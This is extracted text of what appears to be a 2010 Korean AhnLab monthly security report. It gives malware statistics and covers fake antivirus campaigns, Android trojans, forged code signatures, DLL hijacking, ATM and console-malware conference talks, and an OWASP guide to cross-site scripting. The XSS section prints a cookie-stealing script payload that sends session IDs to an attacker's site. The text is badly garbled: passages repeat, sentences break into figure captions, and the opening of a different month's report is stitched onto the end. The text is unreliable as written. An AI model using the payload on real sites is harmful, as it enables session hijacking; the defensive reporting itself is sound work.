- PDF 무료 다운로드

Size: px

Start display at page:

Download ""

여정 장
7 years ago
Views:

Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top20 이다. 2010 년 8 월악성코드통계현황은다음과같다.

3 Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top20 이다 년 8 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1] 악성코드감염보고 Top 년 8월의악성코드감염보고는 TextImage/Autorun이 1위를차지하고있으며, Win32/Induc과 JS/Agent가각각 2위와 3위를차지하였다. 신규로 Top20에진입한악성코드는총 6건이다. 2010년 8월의감염보고건수는 Win-Trojan/Agent가총 824,216건으로 Top20중 13.4% 의비율로 1위를차지하고있으며, Win-Trojan/Onlinegamehack이 735,569건으로 2위, Win-Trojan/Downloader이 674,805 건으로 3위를차지하였다. 아래차트는고객으로부터감염이보고된악성코드유형별비율이다. [ 그림 1-1] 악성코드유형별감염보고비율 AhnLab Policy Center 4.0 세상에서가장안전한이름안철수연구소 01

3위를차지하였다. 신규로 Top20에진입한악성코드는총 6건이다. 2010년 8월의감염보고건수는 Win-Trojan/Agent가총 824,216건으로 Top20중 13.

2010 년 8 월의감염보고건수는악성코드유형별로감염보고건수비율 은트로잔 (TROJAN) 류가 45.8% 로가장많은비율을차지하고, 스크립트 (SCRIPT) 가 13.3%, 웜 (WORM) 이 10.7% 의비율을각각차지하고있다. 아래표는 8 월에신규로접수된악성코드중고객으로부터감염이보고 된악성코드 Top20 이다.

4 2010 년 8 월의감염보고건수는악성코드유형별로감염보고건수비율 은트로잔 (TROJAN) 류가 45.8% 로가장많은비율을차지하고, 스크립트 (SCRIPT) 가 13.3%, 웜 (WORM) 이 10.7% 의비율을각각차지하고있다. 아래표는 8 월에신규로접수된악성코드중고객으로부터감염이보고 된악성코드 Top20 이다. [ 그림 1-2] 악성코드유형별감염보고전월비교 악성코드유형별감염보고비율을전월과비교하면, 스크립트가전월에비해증가세를보이고있는반면트로잔, 웜, 애드웨어 (ADWARE), 바이러스 (VIRUS), 드롭퍼 (DROPPER), 다운로더 (DOWNLOADER), 스파이웨어 (SPYWARE) 는전월에비해감소한것을볼수있다. 애프케어 (AP- PCARE) 계열들은전월수준을유지하였다. [ 표 1-3] 신종악성코드감염보고 Top 20 8 월의신종악성코드감염보고의 Top 20 은 Win-Trojan/Agent AAK 가 53,916 건으로전체 9.9% 를차지하여 1 위를차지하였으며, Win- Trojan/Downloader C 가 49,929 건 2 위를차지하였다. [ 그림 1-3] 악성코드월별감염보고건수 8 월의악성코드월별감염보고건수는 12,531,319 건으로 7 월의악성코 드월별감염보고건수 12,357,777 건에비해 173,542 건이증가하였다. [ 그림 1-4] 신종악성코드유형별분포 8 월의신종악성코드유형별분포는트로잔이 66% 로 1 위를차지하였다. 그뒤를이어애드웨어가 22%, 드롭퍼가 8% 를각각차지하였다. 악성코드이슈 가짜백신설치를유도하는메일형태기승 AhnLab V3 MSS 이번달에도여전히메일에첨부된실행파일이나스크립트파일을이용 한가짜백신설치를유도하는형태가기승을부렸다. 주로다음과같은 02 ASEC Report _ Vol.08

애프케어 (AP- PCARE) 계열들은전월수준을유지하였다. [ 표 1-3] 신종악성코드감염보고 Top 20 8 월의신종악성코드감염보고의 Top 20 은 Win-Trojan/Agent.90112. AAK 가 53,916 건으로전체 9.9% 를차지하여 1 위를차지하였으며, Win- Trojan/Downloader.427520.

메일이유포되었다. 정상백신을사칭하는가짜백신 이번달에는정상백신을사칭하는가짜백신이등장하는일이발생하였다. 해당가짜백신은실행중인상태로대기하다가사용자들이많이사용하는인터넷익스플로러실행파일을실행하면다음과같이경고창을발생한다. 이는잘알려진백신을그대로사칭한모습이다.

이전에발견된경우는성인약품광고를하는곳으로이동하기도하였다. 결론적으로는가짜백신설치를유도한다. 실행파일이첨부된경우는주로다음과같은가짜백신을설치한다. 사용자들이 Apply actions 을클릭하면마치치료하는것처럼거짓치료화면을보여준다. 그러나실제로는인터넷익스플로러파일이삭제되거나치료되지않는다.

5 메일이유포되었다. 정상백신을사칭하는가짜백신 이번달에는정상백신을사칭하는가짜백신이등장하는일이발생하였다. 해당가짜백신은실행중인상태로대기하다가사용자들이많이사용하는인터넷익스플로러실행파일을실행하면다음과같이경고창을발생한다. 이는잘알려진백신을그대로사칭한모습이다. [ 그림 1-5] 가짜백신설치를유도하는메일형태 [ 그림 1-7] 정상백신진단화면을사칭한모습 특히스크립트파일로첨부된형태의경우내부에난독화된스크립트를포함하고있어일반적으로는알아보기어렵다. 또한.html 파일형태이기때문에사용자들이쉽게클릭할수있어주의가요구된다. 해당스크립트가실행되면최근에알려진윈도우도움말취약점이포함된사이트로이동하기도한다. 이전에발견된경우는성인약품광고를하는곳으로이동하기도하였다. 결론적으로는가짜백신설치를유도한다. 실행파일이첨부된경우는주로다음과같은가짜백신을설치한다. 사용자들이 Apply actions 을클릭하면마치치료하는것처럼거짓치료화면을보여준다. 그러나실제로는인터넷익스플로러파일이삭제되거나치료되지않는다. 이후가짜백신은다음과같은화면을보여주는데일부변형은 Virus total 이란유명온라인파일검사사이트로위장하기도하였다. 다른변형은아래모습처럼보여지기도한다. [ 그림 1-8] 가짜백신설치를유도하는화면 [ 그림1-6] 설치된가짜백신종류중하나최근들어메일을통하여유포되는가짜백신설치사례가기승을부리고있다. 이는대부분봇넷들로부터발송이된것으로보고있다. 봇넷들의과열경쟁으로이러한허위메일과스팸메일은더욱더기승을부릴것으로전망되므로이와같은사례를관심있게살펴보고동일한유형의메일은열어보지말고삭제하는것도피해예방의한가지방법중하나이다. [ 그림 1-8] 에서 Free Install 이라고표시된아래백신들은가짜백신이므로위화면이보인경우클릭해서는안된다. Red Cross Peak Protection 2010 Pest Detector Major Defense Kit Antispysafequard 또한다른백신은진단결과가나오지않는조작된화면이므로사용자들 세상에서가장안전한이름안철수연구소 03

은속아서는안된다. 이처럼가짜백신은계속적으로변화하며사용자들에게피해를주고있다. 위경우처럼잘알려진정상백신인것처럼유도하여자신을설치하기도한다. 가짜백신이란자체는오래된보안이슈이지만돈을노리는사이버범죄자들의경쟁구도로정밀하게제작되는만큼앞으로도계속주의가요구된다하겠다.

Android-Trojan/Ewalls의경우스마트폰의배경화면을변경해주는프로그램으로 SIM정보와같이민감한정보들을사용자의동의없이외부로유출하는사례가발견되었다. 제작사에서는보다더나은프로그램개발을위해정보를수집한다고해명하고있으나개인을식별할수있는정보의경우당사자의동의없이외부로유출하는것은불법적인행위가될수있다. 이악성코드에대해서는뒤에서자세히알아보겠다.

6 은속아서는안된다. 이처럼가짜백신은계속적으로변화하며사용자들에게피해를주고있다. 위경우처럼잘알려진정상백신인것처럼유도하여자신을설치하기도한다. 가짜백신이란자체는오래된보안이슈이지만돈을노리는사이버범죄자들의경쟁구도로정밀하게제작되는만큼앞으로도계속주의가요구된다하겠다. 스마트폰악성코드의본격적인등장 2010년 8월달을시작으로안드로이드 (Android) 플랫폼을기반으로한스마트폰 (SmartPhone) 에서동작하는악성코드가발견되기시작하고있다. 8월달엔총 3가지종류의안드로이드플랫폼용악성코드가다음과같이발견되었다. Android-Trojan/Ewalls의경우스마트폰의배경화면을변경해주는프로그램으로 SIM정보와같이민감한정보들을사용자의동의없이외부로유출하는사례가발견되었다. 제작사에서는보다더나은프로그램개발을위해정보를수집한다고해명하고있으나개인을식별할수있는정보의경우당사자의동의없이외부로유출하는것은불법적인행위가될수있다. 이악성코드에대해서는뒤에서자세히알아보겠다. Android-Trojan/SmsSend는동영상재생기를위장한프로그램으로실제동영상재생기능을수행하지않으면서유료과금을하는 SMS(Short Message Service) 로사용자동의없이문자메시지를발송하는기능을수행한다. Android-Trojan/Snake는게임으로위장해서사용자의위치정보를외부로유출하는악성코드이다. 실제게임을할수있지만그도중에사용자의위치정보를사용자의동의없이전송하는기능을가지고있다. 이번 8월달에발견된스마트폰악성코드는모두안드로이드플랫폼용으로제작된소프트웨어로사용자의동의없이내부정보를외부로유출하고 SMS를발송하는기능을가지고있다. 앞으로이런추세는계속될전망이다. 따라서사용자는스마트폰용애플리케이션을다운로드받고설치하기전에어떠한기능을가지고있는지명확하게확인하고또사용자들이남긴코멘트를잘읽어보고악의적인요소가없는지알아본뒤설치하는것이좋다. [ 그림1-9] 어플리케이션구동화면사용자정보유출기능이포함된위악성어플리케이션이동작시스마트폰내부에서는사용자관련정보를수집하고이내용을네트워크를통해전송하는기능을수행하게된다. 아래그림1-10은 V3 Mobile 제품에서 Android-Spyware/Ewalls 악성어플리케이션이진단된그림이다. 안드로이드폰배경화면어플리케이션에삽입된악성코드 V3 Mobile 제품에서는안드로이드폰용배경화면어플리케이션 (App) 중에서사용자개인정보를유출하는기능을가지고있는어플리케이션을 Android-Spyware/EWalls 이라는진단명으로진단하고있다. 아래 [ 그림1-9] 는 Android-Spyware/EWalls로진단되는어플리케이션들을캡쳐한것이다. [ 그림1-10] V3 Mobile 제품에서악성어플리케이션을진단한화면캐스퍼스키 (Kaspersky) 의전자서명을도용한악성코드최근해외보안업체와일부해외언론을통해일반적으로해당기업에서제작하여배포하는파일이며신뢰할수있는파일이라는의미에서사용하는전자서명 (Digital Signature) 을위조하여사용하는악성코드들이발견되었다. 이번과같이특정기업의전자서명을위조한사례로는 7 월초한국에서도발견되었던국내특정포탈에서배포하는파일로위장하기위해해당기업의전자서명을위조하여배포한사례가있다. 그러나이번에발견된악성코드에서위조한전자서명은과거의일반기업의전자서명을위조한사례와달리러시아보안업체인캐스퍼스키에서배포한신뢰할수있는파일로위장하였다는점을특이사례로볼수있다. AhnLab V3 Internet Security ASEC Report _ Vol.08

7 [ 그림 1-11] 캐스퍼스키의인증서를도용한악성코드 이번과같이특정악성코드가위조한캐스퍼스키의전자서명은모두유효기간이종료된것으로서, 유효기간만료여부를악성코드판단시에활용할수있다. 하지만, 지속적으로악성코드에서일반기업의전자서명을위조하여사용하거나실제전자서명에사용되는암호화키를탈취하여전자서명에사용하게될경우에는악성여부를판단하는데어려움이있을수있다. 그리고실제 7월 19일윈도우쉘 (Shell) 취약점을악용하였던 Stuxnet의경우루트킷 (Rootkit) 드라이버파일이특정기업의암호화키를사용하여전자서명이된것으로알려져있다. 러시아보안업체인캐스퍼스키의전자서명을위조하여사용한악성코드는 V3 제품군에서다음과같이진단한다. Win-Trojan/Zbot Win-Trojan/Agent B Win-Trojan/Zbot [ 그림 1-12] 허위어도비플래시플레이어업데이트웹사이트해당허위웹사이트에서는위이미지의붉은색박스를클릭하게되면아래이미지와같이 install_flash_player.exe (25,088 바이트 ) 파일을다운로드하게된다. [ 그림 1-13] 허위어도비플래시플레이어업데이트웹사이트에서유포하는악성코드 허위어도비플래시플레이어업데이트로위장한악성코드 8월 11일해외에서허위로만들어진어도비 (Adobe) 플래시플레이어 (Flash Player) 업데이트웹사이트를통해악성코드를유포하고있는것이발견되었다. 이번에발견된허위어도비플래시플레이어업데이트웹사이트는최근에어도비사에서취약점제거를위해보안패치를배포한것과유사한시기에발견된형태라주의가필요하다. 허위어도비플래시플레이어업데이트웹사이트는아래이미지와같이실제어도비에서운영하는업데이트웹사이트와유사하게제작되어있어일반사용자의입장에서는허위사실여부를파악하기어렵다는점을특이사항으로볼수있다. 다운로드한파일은악성코드로서해당파일이실행되면정상 svchost. exe 파일의메모리영역에자신의코드를삽입하여허위백신을설치하는다른악성코드변형들을다운로드하는기능등을수행하게된다. 이번에발견된허위어도비플래시플레이어업데이트웹사이트에서유포한악성코드는 V3 제품군에서다음과같이진단한다. Win-Trojan/Injector K 이러한허위웹사이트를통해악성코드가유포되는사례가있음으로소프트웨어업데이트의경우에는해당제품을통해직접업데이트를진행하고웹브라우저를통해업데이트를진행할경우에는웹사이트주소를미리확인하여실제해당업체에서운영하는웹사이트인지미리확인해보는것이중요하다. 세상에서가장안전한이름안철수연구소 05

B Win-Trojan/Zbot.138216 [ 그림 1-12] 허위어도비플래시플레이어업데이트웹사이트해당허위웹사이트에서는위이미지의붉은색박스를클릭하게되면아래이미지와같이 install_flash_player.exe (25,088 바이트 ) 파일을다운로드하게된다.

2. 시큐리티동향시큐리티통계 8월마이크로소프트보안업데이트현황마이크로소프트사로부터발표된이번달보안업데이트는총 14건이다. 시큐리티이슈 ATM( 현금자동입출금기, AutomatedTeller Machine) 취약점이번 BlackHat2010과 DEFCON18에서는 ATM에존재하는취약점에관한내용이발표되었다.

8 2. 시큐리티동향시큐리티통계 8월마이크로소프트보안업데이트현황마이크로소프트사로부터발표된이번달보안업데이트는총 14건이다. 시큐리티이슈 ATM( 현금자동입출금기, AutomatedTeller Machine) 취약점이번 BlackHat2010과 DEFCON18에서는 ATM에존재하는취약점에관한내용이발표되었다. 발표자는, 발표현장에서직접 ATM을공격하여모니터에 Jackpot 화면을출력하고, 무수히많은돈이계속인출되게하였다. [ 그림 2-1] 공격대상기준별 MS 보안업데이트 [ 그림 2-3] ATM 공격시연현장 ( 사진 -wired.com) [ 표 2-1] 2010년 8월주요 MS 보안업데이트이번달은다수의원격취약점에대한업데이트를포함하여, 시스템 10 건, IE 1건, 오피스 2건, 어플리케이션 1건에대한업데이트가진행되었다. 특히, 웹사이트를방문하거나 (MS10-049, MS 등 ) 문서파일을열어보는것 (MS10-056, MS10-057) 만으로도피해를입을수있는취약점들이존재하기때문에주의를요한다. 공격유형은크게, ATM의관리기능취약점을이용하여원격에서공격하는방법과, ATM 기계자체에연결되어있는 USB 포트등에연결하여공격하는것으로나뉜다. 발표에서는취약점자체에대한기술적인언급은자세하게하지않았지만 ATM 역시컴퓨터와비슷한형태의공격이가능하다는것이증명되었다. 8 월마이크로소프트보안업데이트현황 [ 그림 2-3] ATM 공격시연현장 ( 사진 -wired.com) [ 그림 2-2] 악성코드를배포했던침해사이트 / 배포사이트통계 [ 그림 2-2] 는월별악성코드침해사이트현황을나타낸그래프로, 전월에비해침해사이트및배포사이트가다소감소하였다.( 파란그래프 : 침해사이트, 붉은그래프 : 배포사이트 ) 다행히도발표자가발견한취약점들은모든 ATM에동일하게적용되는것은아닌, 특정한기기들에대한것으로써, 해당취약점들은이미 ATM 제작사들에게통보되어해결이된상황이다. 하지만해당 ATM 기기들뿐만아닌, 다른 ATM 제조사의기기들도비슷한취약점들이존재할가능성이높기때문에관심이필요하다. DLL Hijacking 취약점최근취약점공유사이트에서는 DLL Hijacking 관련취약점에관한공격코드들이무수히등록되고있다. 해당취약점은어플리케이션이 DLL을 06 ASEC Report _ Vol.08

com) [ 표 2-1] 2010년 8월주요 MS 보안업데이트이번달은다수의원격취약점에대한업데이트를포함하여, 시스템 10 건, IE 1건, 오피스 2건, 어플리케이션 1건에대한업데이트가진행되었다.

9 로딩하는과정에서발생한다. 일반적으로 DLL을호출할때사용되는함수인 LoadLibrary() 와 LoadLibraryEx() 함수를사용하면서절대경로를지정하지않았을경우, 다음과같은순서에따라해당디렉토리들을순차적으로검색하여명시된 DLL을찾는다. 1. 프로그램이실행된디렉토리 2. 시스템디렉토리 3. 16비트시스템디렉토리 4. 윈도우디렉토리 5. 현재작업중인디렉토리 (CWD) 6. 환경변수에등록되어있는디렉토리들만약, 명시된 DLL과동일한이름의 DLL이보다높은검색순서에해당하는디렉토리에존재한다면, 원래실행되어야하는 DLL 대신실행될것이다. 공격자는이점을악용하여자신이원하는 DLL을실행할수있게된다. [ 그림 2-6] 원본게임바이너리헤더 [ 그림 2-7] 악성코드가삽입되어변경된바이너리헤더또한, 컴퓨터에서동작하는바이러스와같이, 임베디드시스템에서동작하는프로그램의코드를조작하여원하는코드를추가할수있기때문에임베디드시스템에서동작하는바이러스도발생할수있다는것을알리고, 직접 Wii에서동작하는바이러스에감염된게임을동작시켰다. 발표자가제작한바이러스는홈네트워크의공유기와사용자의컴퓨터를공격하여인터넷을마비시키고, 사용자의컴퓨터를좀비PC로만들어서공격자의봇넷에추가하도록했다. [ 그림 2-5] DLL Hijacking 을이용한가상공격시나리오 해당취약점을해결하기위한몇가지방법들이권고되었지만 ( support.microsoft.com/kb/ ), 시스템의불안정을야기시키거나기능상의제한이불가피하기때문에윈도우시스템자체의취약점수정이필요한상황이다. 또한, 해당취약점은 DLL 메커니즘자체에대한문제도있기때문에관련패치가나온다하더라도, 완벽한해결을위해서는어플리케이션차원에서의대응이필요하다. 콘솔게임기에서동작하는악성코드 DEFCON18에서는임베디드시스템에서동작할수있는악성코드에관한발표가있었다. 이발표에서는, 콘솔게임기인 NDS와 Wii를이용하여게임기도컴퓨터와같이네트워크를마비시키거나다른컴퓨터를공격할수있으며, 불법으로게임을다운로드받아서실행할경우악성코드에감염되어심각한피해가발생할수있음을보여줬다. 발표자는, 발표에서보여준콘솔게임기들은물론, 요즘대다수의임베디드디바이스들은컴퓨터와마찬가지로네트워크장치및입출력장치등을갖추고있고, 사용자로하여금손쉽게원하는프로그램을제작하여해당장치에서동작할수있는환경이제공되고있기때문에컴퓨터와동일한방식으로, 휴대용게임기에서동작하는공격도구를제작할수있음을알린후, NDS를이용하여컴퓨터와네트워크를공격하는데모를보여줬다. [ 그림 2-8] 악성코드에감염된게임에의하여 Wii가홈네트워크를공격하는시연게임기뿐만아니라, 최근국내에서도많이사용되고있는아이폰, 안드로이드폰과같은스마트폰에서도역시비슷한상황이다. 인터넷에서불법으로공유되고있는어플리케이션에도악성코드가삽입되어있을수있기때문에주의해야한다. 이발표에서주장하는것과같이, 이미예전부터콘솔게임기를비롯한임베디드시스템역시컴퓨터와마찬가지로자신은물론타인에게큰피해를줄수있는힘을갖고있으며, 불법으로어플리케이션을다운받아이용할경우악성코드에의해임베디드시스템은물론, 자신의컴퓨터및타인의컴퓨터, 네트워크까지피해를입힐수있음을알아야한다. Imm32.dll를패치하는악성코드의증가 8월에도마찬가지로주말에는어김없이 imm32.dll을패치하는악성코드를비롯하여 AV-Killer기능을가진게임핵악성코드가집중적으로유포되었음을확인하였다. 세상에서가장안전한이름안철수연구소 07

[ 그림 2-6] 원본게임바이너리헤더 [ 그림 2-7] 악성코드가삽입되어변경된바이너리헤더또한, 컴퓨터에서동작하는바이러스와같이, 임베디드시스템에서동작하는프로그램의코드를조작하여원하는코드를추가할수있기때문에임베디드시스템에서동작하는바이러스도발생할수있다는것을알리고, 직접 Wii에서동작하는바이러스에감염된게임을동작시켰다.

10 3. 웹보안동향 웹보안통계 월별악성코드보안요약 [ 그림 2-9] imm32.dll 패치악성코드의유포주기 ~ 악성코드발견건수는 94,045건이고, 악성코드유형은 880건이며, 악성코드가발견된도메인은 782건이며, 악 [ 표3-1] 웹사이트보안요약성코드발견된 URL은 3,638 건이다. 2010년 8월은 2010년 7월보다악성코드발견건수는다소감소하였으나, 악성코드유형, 악성코드가발견된도메인, 악성코드발견된 URL 은증가하였다. 월별악성코드발견건수 ~ [ 그림 2-10] imm32.dll 패치악성코드의유포내역 [ 그림 3-1] 월별악성코드발견건수 2010 년 8 월악성코드발견건수는전달의 100,682 건에비해 93% 수준 인 94,045 건이다. 월별악성코드유형 [ 그림 2-11] imm32.dll 패치악성코드의피해건수 (V3Lite 기준 ) [ 그림 2-11] 에설명되어있는피해건수는주말동안에발생한것이며, 지금까지언급한내용들을종합해보면평일보다는주말에 PC사용량이많고, 감염되었던 PC들은보안업데이트가제대로안되어있었음을의미한다. 침해사이트를통해서악성코드유포시 MS10-042취약점이용사례도꾸준히발견되어있어사용자들의주의가필요하며반드시보안업데이트를적용해주는것이악성코드의감염을예방할수있는지름길이다. [ 그림 3-2] 월별악성코드유형 2010 년 8 월악성코드유형은전달의 740 건에비해 119% 수준인 880 건이다. 08 ASEC Report _ Vol.08

월별악성코드발견건수 2010-08-13 ~ 2010-08-16 http://wow.*******.com/script/movie_ativex_patch.js http://*******.com/a.htm http://*******.com/k.js http:/*******.com/n.exe [ 그림 2-10] imm32.

11 월별악성코드가발견된도메인 [ 그림 3-5] 악성코드유형별배포수 [ 그림 3-3] 월별악성코드가발견된도메인 2010년 8월악성코드가발견된도메인은전달의 708건에비해 110% 수준인 782건이다. 월별악성코드가발견된 URL 악성코드유형별배포수에서애드웨어류가 34,489건전체의 36.7% 로 1위를차지하였으며, 트로잔류가 26,372건으로전체의 28% 로 2위를차지하였다. 악성코드배포 Top 10 [ 그림 3-4] 월별악성코드가발견된 URL 2010년 8월악성코드가발견된 URL은전달의 3,112건에비해 117% 수준인 3,638건이다. 악성코드유형별배포수 [ 표 3-3] 악성코드배포 Top 10 악성코드배포 Top10에서 Win-Adware/Shortcut.InlivePlayerActiveX.234이 15,836건으로 1위를차지하였으며, Top10에 Dropper/ Malware HJ등 5건이새로등장하였다. 웹보안이슈 OWASP 2010 TOP2 지난 Vol.07은 Vol.06에서개괄적으로살펴보았던 OWASP 2010 Top10 을하나씩자세히살펴보고있다. 그두번째시간으로 OWASP 2010 Top 2크로스사이트스크립팅 (XSS) 1 공격에대해서알아보자. 먼저크로스사이트스크립팅공격의주요사항은다음의그림을통해알수있다. [ 표 3-2] 악성코드유형별배포수 [ 그림 3-6] 크로스사이트스크립팅개괄 1. café.naver.com/securityplus 세상에서가장안전한이름안철수연구소 09

악성코드유형별배포수 [ 표 3-3] 악성코드배포 Top 10 악성코드배포 Top10에서 Win-Adware/Shortcut.InlivePlayerActiveX.234이 15,836건으로 1위를차지하였으며, Top10에 Dropper/ Malware.97280.HJ등 5건이새로등장하였다.

12 1) 주요내용 Threat Agents( 공격자 ) : 내, 외부사용자, 관리자를포함한시스템에신뢰할수없는데이터를보낼수있는사람. Attack Vectors( 공격경로 ) : 공격자는브라우저에서인터프리터를악용할수있는텍스트기반의공격스크립트를전송한다. 데이터베이스의데이터와같은내부소스를포함한거의모든데이터소스가공격경로로사용될수있다. Security Weakness( 보안취약점 ) : XSS는가장널리알려진웹어플리케이션보안결함이다. XSS 결함은어플리케이션이적절하게검증하거나제한하지않고사용자가제공한데이터를브라우저가전송한페이지에포함시킬때발생한다. XSS결함은 Stored, Rflected, 그리고 DOM 기반 XSS. 이렇게 3가지의알려진형태가있다. 대부분의 XSS 결함은테스트나코드분석을통해아주쉽게탐지할수있다. Technical Impacts( 기술적영향 ) : 공격자는사용자세션하이재킹, 웹사이트변조, 악성콘텐츠삽입, 사용자리다이렉트, 악성코드를사용해사용자브라우저하이재킹등을위해사용자브라우저에스크립트를실행할수있다. Business Impacts( 비즈니스영향 ) : 영향받는시스템과시스템이처리하는모든데이터의비즈니스가치를고려한다. 또한취약점의공개적노출이비즈니스에미치는영향도고려해야한다. 2) 인젝션공격예이어플리케이션은신뢰할수없는데이터를검증이나제한처리없이 HTML 구성에사용한다 : (String) page += <input name= creditcard type= TEXT value= + request.getparameter( CC ) + > ; 공격자는브라우저에서이 CC 변수를아래와같이수정한다 : 선호되는방법으로는신뢰할수없는데이터가포함될수있는 HTML(body, attribute, 자바스크립트, CSS, URL) 기반데이터전체를올바르게제한하는것이다. UI 프레임워크에서제한처리를수행하지않는다면, 개발자들은어플리케이션내에서제한처리를포함시켜야한다. 적절한정규화와디코딩으로긍정적혹은화이트리스트입력검증을수행하는것도 XSS로부터보호하는데도움이되지만, 입력에특수문자가필요한어플리케이션많이있기때문에완벽한방어책은될수없다. 이경우, 입력을허용하기전에가능한인코딩된모든입력을디코딩해길이, 문자, 포맷, 데이터관련업무역할을검증하도록한다. 지금까지 OWASP 2010 TOP2인크로스사이트스크립팅 (XSS) 에대해알아보았다. 추가적인내용은아래의 reference를참고하기바란다. [Reference] OWASP OWASP XSS Prevention Cheat Sheet OWASP Cross-Site Scripting Article ESAPI Project Home Page ESAPI Encoder API ASVS: Output Encoding/Escaping Requirements (V6) ASVS: Input Validation Requirements (V5) Testing Guide: 1st 3 Chapters on Data Validation Testing OWASP Code Review Guide: Chapter on XSS Review External CWE Entry 79 on Cross-Site Scripting RSnake sxss Attack Cheat Sheet ><script>document.location= +document.cookie</script>. 사용자의세션ID는공격자의웹사이트로전송되어, 공격자는사용자의현재세션을하이재킹할수있다. 공격자는XSS를사용해어플리케이션의 CSRF 방어를무력화할수도있다는점에주의하도록한다. 3) 대응책 XSS 를대응책으로는활성브라우저콘텐츠와신뢰할수없는데이터를 항상분리해야만한다. AhnLab V3Net for Windows Server ASEC Report _ Vol.08

대부분의 XSS 결함은테스트나코드분석을통해아주쉽게탐지할수있다. Technical Impacts( 기술적영향 ) : 공격자는사용자세션하이재킹, 웹사이트변조, 악성콘텐츠삽입, 사용자리다이렉트, 악성코드를사용해사용자브라우저하이재킹등을위해사용자브라우저에스크립트를실행할수있다.

Ⅰ. 이달의 보안 동향 1. 악성코드 동향 아래 표는 악성코드의 주요 동향을 파악하기 위하여, 악성코드별 변종을 종합한 악성코드 대표진단명 감염보고 Top20이다. 악성코드 통계 2010년 10월 악성코드 통계현황은 다음과 같다. [표 1-2] 악성코드 대표진단명 감염

Ⅰ. 이달의 보안 동향 1. 악성코드 동향 아래 표는 악성코드의 주요 동향을 파악하기 위하여, 악성코드별 변종을 종합한 악성코드 대표진단명 감염보고 Top20이다. 악성코드 통계 2010년 10월 악성코드 통계현황은 다음과 같다. [표 1-2] 악성코드 대표진단명 감염보고 Top 20 2010년 10월의 감염보고 건수는 Win-Trojan/Agent가 총 856,917건